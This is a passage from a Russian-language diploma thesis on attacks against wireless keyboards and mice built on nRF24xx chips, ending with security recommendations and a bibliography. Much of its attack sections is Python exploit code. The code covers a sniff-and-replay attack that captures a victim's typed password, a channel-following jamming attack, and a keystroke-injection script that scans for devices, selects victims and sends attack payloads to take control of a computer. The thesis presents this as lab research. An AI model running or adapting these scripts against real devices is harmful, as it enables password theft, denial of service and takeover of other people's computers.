Комплексный анализ уязвимостей систем беспроводного взаимодействия

Суть атаки состоит в том, что злоумышленник перехватывает полезную информацию пользователя, а затем воспроизводит её. Данная атака может быть применена для перехвата паролей пользователя, при его входе в систему и последующей авторизации в системе в период отсутствия пользователя.

Для осуществления данной атаки были написаны два скрипта на языке «Python»: первый скрипт перехватывает информацию передаваемую пользователем и записывает ее в файл, второй скрипт в нужный момент воспроизводит записанную информацию.

Фрагмент первого листинга приведен далее:

# Анализ адреса

address = common.args.address.replace(':', '').decode('hex')[::-1][:5]

address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])

if len(address) < 2:

raise Exception('Invalid address: {0}'.format(common.args.address))

Данное действие необходимо для загрузки MAC-адреса атакуемого устройства в исполняемую программу. В дальнейшем перехватываться будут только пакеты пришедшие с этого адреса.

# Переключение устройства в режим сниффера

common.radio.enter_sniffer_mode(address)

Данное действие необходимо для перевода устройства в режим работы пригодный для перехвата пакетов.

# Анализ служебной полезной нагрузки

ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

Данное действие необходимо для выделения служебной информации из пакета

# Задание временных интервалов номера подтверждения и повторной

попытки

ack_timeout = int(common.args.ack_timeout / 250) - 1

ack_timeout = max(0, min(ack_timeout, 15))

retries = max(0, min(common.args.retries, 15))



Данное действие необходимо для обеспечения функции повторной отправки при неудачной попытке

# Переключение между каналами и декодирование ESB-пакетов в

псевдо-случайном

last_ping = time.time()

channel_index = 0

# Запись переданных данных

dump_data={

'addr':address_string,

'data':[]

}

def handler(signal_num,frame):

print("\nPressed Ctrl-C.\nDump file saving...")

f = open('%s.json' % (address_dump),'w')

f.write(json.dumps(dump_data))

f.close()

print("Dump file save in %s.json" % (address_dump))

sys.exit(signal_num)

Данное действие необходимо для подготовки к записи перехваченной информации в файл для ее последующего воспроизведения.

signal.signal(signal.SIGINT, handler)

while True:

# Отслеживание целевого устройства при изменении

if time.time() - last_ping > timeout:

# Первая попытка пинга на активном канале

if not common.radio.transmit_payload(ping_payload, ack_timeout, retries):

# Переключение на другой канал при неудачном пинге на активном

канале

success = False

for channel_index in range(len(common.channels)):

common.radio.set_channel(common.channels[channel_index])

if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

# Действия при успешном прохождении пинга

last_ping = time.time()

logging.debug('Ping success on channel

{0}'.format(common.channels[channel_index]))

success = True

break

# Действие при неудаче пингования

if not success: logging.debug('Unable to ping {0}'.format(address_string))

# Действия при удачном пинге активного канала

else:

logging.debug('Ping success on channel

{0}'.format(common.channels[channel_index]))

last_ping = time.time()

Данные действия необходимы для анализа активности в атакуемом канале и своевременного изменения настроек для успешного перехвата пакетов

# Запись полезной нагрузки

value = common.radio.receive_payload()

if value[0] == 0:

# Отделение полезной информации от служебных данных

payload = value[1:]

# запись пакетов

logging.info('{0: >2} {1: >2} {2} {3}'.format(

common.channels[channel_index],

len(payload),

address_string,

':'.join('{:02X}'.format(b) for b in payload)))

dump_data['data'].append({'ch':common.channels[channel_index],'lp':len(pa

yload),'pl':':'.join('{:02X}'.format(b) for b in payload)})

Данные действия необходимы для записи, предварительно подготовленной и форматированной, перехваченной информации в файл определенного формата с именем, полученным из MAC-адреса устройства.

Фрагмент второго листинга приведен далее:

#Загрука файла с сохраненной информацией

raw_json = open(common.args.json_file,'r')

dump_data = json.loads(raw_json.read())

raw_json.close()

#Получение целевого адреса из информации в файле

address = dump_data['addr'].replace(':', '').decode('hex')[::-1][:5]

logging.info('Target Address: {0} , {1} payload

loaded!'.format(dump_data['addr'],len(dump_data['data'])))

Данные действия необходимы для получения данных из ранее записанного файла с информацией вводимой жертвой.

# Переключение устройства в режим сниффера

common.radio.enter_sniffer_mode(address)

Данное действие необходимо для перевода устройства в режим работы пригодный для перехвата пакетов.

# Анализ служебной полезной нагрузки

ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

Данное действие необходимо для выделения служебной информации из пакета

# Задание временных интервалов номера подтверждения и повторной

попытки

ack_timeout = int(common.args.ack_timeout / 250) - 1

ack_timeout = max(0, min(ack_timeout, 15))

retries = max(0, min(common.args.retries, 15))

Данное действие необходимо для обеспечения функции повторной отправки при неудачной попытке

while True :

# Переключение по каналам

for c in range(len(common.args.channels)):

common.radio.set_channel(common.channels[c])

# Попытка эхо-запроса на адрес

if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

logging.info('Found {0} on channel

{1}'.format(dump_data['addr'],common.channels[c]))

logging.info('Start replay attack!')

for c in range(len(dump_data['data'])):

time.sleep(0.007)

common.radio.transmit_payload(dump_data['data'][c]['pl'].replace(':',

'').decode('hex'))

logging.info('Replay attack done!')

Данное действие необходимо для воспроизведения ранее перехваченной информации в эфир и вывода строки состояния.

В совокупности два этих скрипта реализуют Replay-атаку. Первый направлен на перехват информации предаваемой пользователем, второй - на ее воспроизведение в нужный момент.

Данная атака обычно используется для перехвата парольной информации и ее последующего воспроизведения. Смоделируем ситуацию:

Легитимный пользователь на своей клавиатуре вводит пароль для входа в систему (рис. 5.7)

Рис. 5.7 - Ввод пароля легитимным пользователем

В это время злоумышленник, который контролирует эфир в зоне действия беспроводного устройства ввода, перехватывает данные с помощью первого скрипта и записывает ее в файл (рис. 5.8)



Рис. 5.8 - Перехват парольной информации злоумышленником и запись ее в файл

После этого злоумышленник, улучив момент, во время отсутствия легитимного пользователя на рабочем месте, получает физический доступ к компьютеру пользователя и с помощью второго скрипта воспроизводит информацию, записанную в файле (рис. 5.9)

Рис. 5.9 - Воспроизведение перехваченной информации злоумышленником

Компьютер пользователя воспринимает передаваемые злоумышленником сигналы как сигналы от клавиатуры пользователя и повторяет ввод пользователем пароля (рис. 5.10).

Рис. 5.10 - Авторизация злоумышленника по повторным данным пользователя

После ввода пароля злоумышленник получает доступ к компьютеру жертвы и может совершить вредоносное воздействие. Недостатком данной атаки в нашем случае является необходимость физического доступа к компьютеру жертвы, однако он с лихвой компенсируется спектром возможных дальнейших действий злоумышленника.

Данная атака может быть реализована и для мышей, особенно опасным может быть ее применение при использовании мыши, как основного устройства ввода, например, при вводе паролей на экранных клавиатурах.

Стоит отметить, что некоторые производители пытаются обезопасить свои продукты от Replay-атак, так, например, исследованная в работе клавиатура от компании «Microsoft» имеет защиту от данного типа атак путем синхронного изменения некоторой служебной информации, однако исследования показали, что изменение происходит примерно через тысячу нажатий, что происходит за достаточно продолжительный срок. Поэтому Replay-атака может быть реализована не только сразу после введения ключевой информации, но и через продолжительное время (промежуток времени зависит от интенсивности работы на клавиатуре).



5.5 Атака - отказ в обслуживании

Ещё одним типом атак является атака отказа в обслуживании - DoS-атака. Принцип атаки заключается в блокировании действий легитимных пользователей. В нашем случае данная процедура реализуется с помощью постановки помехи на частоте, используемой для радиообмена. В данном случае задача злоумышленника осложняется тем, что устройство ввода переключается между каналами в случае, если канал занят. Для решения данной задачи злоумышленник может использовать два метода: постановка широкополосной помехи во всем диапазоне рабочих частот чипа nRF24xx или занимать один или несколько каналов, на которых работает устройство и синхронно переключаться при смене устройством канала передачи.

В данной работе был реализован второй способ атаки. Комплект оборудования и программного обеспечения использовался для блокирования работы на конкретных частотах с их синхронной перестройкой при изменении канала передачи.

Для реализации атаки был написан скрипт на языке программирования «Python». Фрагмент листинга программы представлен далее:

# Задание временных интервалов номера подтверждения и повторной

попытки

ack_timeout = int(common.args.ack_timeout / 250) - 1

ack_timeout = max(0, min(ack_timeout, 15))

retries = max(0, min(common.args.retries, 15))

Данное действие необходимо для обеспечения функции повторной отправки при неудачной попытке

while True:

# Переключение по каналам

for c in range(len(common.args.channels)):

common.radio.set_channel(common.channels[c])

# Попытка эхо-запроса на адрес

if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

# Передача по заданному радиоканалу продолжительного тонового

сигнала

common.radio.enter_tone_test_mode()

Данное действие необходимо для определения активного радиоканала и передачи по нему тонового сигнала для блокирования радиопередачи по данному каналу.

В качестве эксперимента демонстрирующего данную атаку был произведен последовательный ввод чисел от 0 до 15 через пробел при запущенной программе. Результаты ввода (рис. 5.11)

Рис. 5.11 - Последовательный ввод чисел от 0 до 15 через пробел при попытке реализации DoS-атаки

Как видно из рисунка (рис. 5.11) атака достаточно эффективна, но в некоторых случаях передатчик злоумышленника не успевает перестраиваться за изменением рабочего канала устройства. Для устранения данного недостатка можно использовать несколько атакующих передатчиков.

5.6 Атака - несанкционированное внедрение информации в передаваемые данные

Ещё один опасный вид атак на устройства ввода - это атаки Injection. Суть атаки заключается в том, что злоумышленник с помощью атакующего устройства направляет на компьютер жертвы, созданные самостоятельно информационные пакеты, которые воспринимаются как легитимные, а команды, содержащиеся в этих пакетах выполняются. Можно выделить три основных вида Injection-атак на беспроводные устройства ввода:

1) Атака эмуляции работы мыши. Злоумышленник находит коды команд перемещения курсора компьютера с помощью мыши (рис. 5.12), обычно содержащиеся в программе драйвере к мыши или записанные в системных файлах.

Рис. 5.12- Расположение файлов команд для мыши в системных папках

Проводя реверсивный анализ полученной информации, злоумышленник может эмулировать работу мыши и, например, запустить командную строку вместе с экранной клавиатурой, получив, таким образом, практически полный доступ к компьютеру жертвы.

2) Атака эмуляции работы клавиатуры. Злоумышленник с помощью атакующего оборудования эмулирует работу клавиатуры. Однако для создания кодов клавиатуры в данной атаке злоумышленнику необходимо знать пароль шифрования данных клавиатуры иначе его команды не будут распознаны. Получение ключа шифрования не является чем то недостижимым. Если злоумышленник получит физический доступ к атакуемому устройству, то он может получить ключ шифрования проанализировав микропрограмму ("прошивку") устройства, применив к ней методы реверсивного анализа. Если же физический доступ к атакуемому устройству невозможен, то пароль может быть взломан методами криптоанализа или с использованием уязвимостей методов шифрования у конкретных производителей, однако это тема отдельного исследования.

3) Атака с использованием эмуляции клавиатуры через интерфейс мыши. Данная атака основывается на отправке пакетов клавиатуры на интерфейс мыши, которые неверно интерпретируются атакуемым компьютером и воспринимаются как нажатия клавиш клавиатуры. Передача данных от мыши в незашифрованном виде способствует проведению данной атаки. Для осуществления данной атаки злоумышленнику необходима база команд клавиатуры для атакуемого устройства. Фрагмент листинга скрипта для реализации данной атаки, написанного на языке программирования "Python" представлен далее:

try:

if targeted:

print G + "[+] " + W + 'Starting sniff for %s...' % address

if vendor.startswith("l"):

jack.add_device(address, [0, 0xC2, 0, 0, 0, 0, 0, 0, 0, 0])

if vendor.startswith("m"):

jack.add_device(address, [])

else:

print G + "[+] " + W + 'Starting scan...'

try:

# ввод главного цикла

while True:

if targeted:

devices = jack.sniff(interval, address)

else:

devices = jack.scan(interval)

click.clear()

if targeted:

print GR + "[+] " + W + ("Sniffing for %s every %ds " % (address, interval))

+ G + "CTRL-C " + W + "when ready."

else:

print GR + "[+] " + W + ("Scanning every %ds " % interval) + G + "CTRL-

C " + W + "when ready."

print ""

idx = 0

pretty_devices = []

for key, device in devices.iteritems():

idx = idx + 1

pretty_devices.append([

idx,

key,

",".join(str(x) for x in device['channels']),

device['count'],

str(datetime.timedelta(seconds=int(time.time() - device['timestamp']))) + '

ago',

device['device'],

jack.hexify(device['payload'])

])

print tabulate.tabulate(pretty_devices, headers=["KEY", "ADDRESS",

"CHANNELS", "COUNT", "SEEN", "TYPE", "PACKET"])

except KeyboardInterrupt:

print ""

if 'devices' not in locals() or len(devices) == 0:

print R + "[!] " + W + "No devices found please try again..."

exit(-1)

if attack == "":

print R + "[!] " + W + "No attack script was provided..."

exit(-1)

print GR + "\n[+] " + W + "Select " + G + "target keys" + W + " (" + G + "1-

%s)" % (str(len(devices)) + W) + \

" separated by commas, or '%s': " % (G + 'all' + W),

value = click.prompt('', default="all")

value = value.strip().lower()

if value == "all":

victims = pretty_devices[:]

else:

victims = []

for vic in value.split(","):

if int(vic) <= len(pretty_devices):

victims.append(pretty_devices[(int(vic)-1)])

else:

print R + "[!] " + W + ("Device %d key is out of range" % int(vic))

targets = []

for victim in victims:

if victim[1] in devices:

targets.append(devices[victim[1]])

for target in targets:

payload = target['payload']

channels = target['channels']

address = target['address']

device_type = target['device']

# Переход в режим сниффера

jack.sniffer_mode(address)

hid = None

# Вывод имеющихся данных

device_type = jack.fingerprint_device(payload)

if device_type == 'Microsoft HID':

hid = MicrosoftHID(address, payload)

elif device_type == 'MS Encrypted HID':

hid = MicrosoftEncHID(address, payload)

elif device_type == 'Logitech HID':

hid = LogitechHID(address, payload)

if hid:

# Попытка эхозапроса на атакуемое устройство для обнаружения

активного канала

lock_channel = jack.find_channel(address)

if lock_channel:

print GR + '[+] ' + W + 'Ping success on channel %d' % (lock_channel,)

print GR + '[+] ' + W + 'Sending attack to %s [%s] on channel %d' %

(jack.hexify(address), device_type, lock_channel)

jack.attack(hid, attack)

else:

# Если эхо-запрос неудачный, то переходим к следующему

print R + '[-] ' + W + 'Ping failed, trying all channels'

for channel in channels:

jack.set_channel(channel)

print GR + '[+] ' + W + 'Sending attack to %s [%s] on channel %d' %

(jack.hexify(address), device_type, channel)

jack.attack(hid, attack)

В данном скрипте в качестве библиотек используются набор кодов для клавиатур разных вендоров. Для осуществления атаки злоумышленник создаёт исполняемый файл (рис.5.13), в котором записывает набор исполняемых команд, например открытие командной строки и запуск приложения "explorer.exe"

Рис. 5.13 - Содержание файла для инъекций нажатий клавиш клавиатуры через интерфейс мыши

Выполнение данного скрипта ведёт к получению злоумышленником полного контроля над атакуемой машиной (рис. 5.14) с огромным спектром вредоносных воздействий не только на компьютер жертвы, но и на систему, частью которой является этот компьютер.

Рис. 5.14 - Результат атаки на компьютере пользователя

Рекомендации по информационной безопасности. Как было показано в ходе выполнения эксперимента большинство беспроводных устройств ввода (даже известных производителей) не защищены от ряда атак, реализация которых угрожает не только компрометации компьютера конкретного пользователя, но и в целом безопасности системы, которую входит этот компьютер. К сожалению, большинство мер по защите беспроводных устройств ввода должны быть приняты производителем. Примерами таких мер может служить:

- шифрование информации передаваемой мышью;

- защита устройств от атак повторения информации злоумышленником путём установки на пакеты зашифрованных динамично изменяющихся меток (например, временных);

- присвоение уникальных шифрованных идентификаторов с динамично изменяющимися параметрами, для предотвращения атак подмены устройства;

- защита микропрограммы устройств от копирования и замены;

- защита протокола взаимодействия устройств от неправильного восприятия переданных команд, для предотвращения исполнения команд клавиатуры через интерфейс мыши.

С точки зрения пользователей необходимо принять следующие меры безопасности:

- исключить использование беспроводных устройств ввода (кроме специальных, сертифицированные средств, необходимых для функционирования системы) на объектах критической инфраструктуры;

- перед приобретением беспроводных устройств ввода анализировать меры безопасности, принятые производителем;

- использовать программные и программно-аппаратные мосты для подключения беспроводных устройств ввода, способные контролировать передаваемые данные и принимать решение об их легитимности;

- не допускать доступ к устройствам посторонних лиц;

- принять меры к защите периметра от радиопередающих и сканирующих устройств, вплоть до установки генераторов активной защиты [1].



ЗАКЛЮЧЕНИЕ

В представленной дипломной работе были изучены наиболее популярные протоколы беспроводного взаимодействия и проанализированы уязвимости основных беспроводных стандартов, а также оценены механизмы защиты ряда беспроводных интерфейсов. Особое внимание было уделено радиочастотному взаимодействию на основе семейства чипов nRF24xx, поскольку данная технология является наиболее распространенной на рынке устройств беспроводного ввода.

Анализ уязвимостей персональных беспроводных сетей, а также атак на эти сети позволил выявить ряд закономерностей и ввести классификацию элементарных атак, на осуществлении комбинаций которых основывается реализация большого количества угроз для информационных систем. К элементарным атакам были отнесены: Scanning, Sniffering, Spoofing, Mapping, Replay, Injection, Dos.

В процессе выполнения работы был создан лабораторный стенд, позволяющий производить элементарные атаки на беспроводные устройства ввода, построенные на базе чипа из семейства nRF24xx. В ходе выполнения эксперимента были осуществлены элементарные на беспроводные устройства ввода, были определены их параметры и условия реализации.

Также были даны рекомендации по обеспечению безопасности беспроводных устройств ввода, построенных на базе чипа из семейства nRF24xx, реализация которых, в зависимости от рекомендации, должна быть выполнена пользователем или производителем.

Цели диплома достигнуты, Все поставленные задачи были выполнены



СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ

1. Аутентификация. Теория и практика обеспечения безопасного доступа к информационным ресурсам [Текст]: учеб. пособие для вузов / А.А. Афанасьев [и др.]; под ред. А.А. Шелупанова. - М.: Горячая линия-Телеком, 2012. - 550 с.

2. Балонин, Н.А. Беспроводные персональные сети [Электронный ресурс]: - учеб. пособие для вузов / Н.А. Балонин, М.Б. Сергеев. - СПб: СПбГУАП, 2012

3. Джим Гейер Беспроводные сети. Первый шаг [Текст] / ред. С.Я. Тригуб; пер. В.С. Гусева. Пер. с англ. - М.: Издательский дом «Вильяме», 2005.-192 с.

4. Круглик, С.А. Практическая реализация атаки «человек посередине» на сопрягаемые Bluetooth-устройства на примере беспроводной клавиатуры [Электронный ресурс]: электрон. статья / С.А. Круглик, Е.С. Пономарёв, Д.И. Вецлер. - М.: Труды МФТИ, 2014. - Т.6, №4. - С.111-119

5. Соколов, М. Реализация беспроводных сетей на основе технологии ZigBee стандарта 802.15.4 [Текст] / М. Соколов, О. Воробьев // Компоненты и технологии. - 2005. - №2. - С. 160- 164.

6. Субхо Гальдер Беспроводная связь ближнего радиуса действия [Электронный ресурс]: электрон. статья / Субхо Гальдер, Адитья Гупта

7. Спецификация Bluetooth [Электронный ресурс]

8. Спецификация NFC [Электронный ресурс]

9. Спецификация nRF24L01 [Электронный ресурс]

10. Спецификация ZigBee [Электронный ресурс]

11. Стариковский, А.В. Атаки на мобильные телефоны, использующие уязвимости технологии NFC [Электронный ресурс] / А.В. Стариковский, А.В. Зуйков, М.С. Аристов // Безопасность информационных технологий. - 2012. - №2. - C. 60-65

12. Шахнович, И.В. Современные технологии беспроводной связи [Текст] / И.В. Шахнович - Изд. 2-е, перераб. и доп. М: РИЦ Техносфера, 2006. - 287 с.

13. Bastille Networks Internet Security [Электронный ресурс]

Размещено на Allbest.ru

...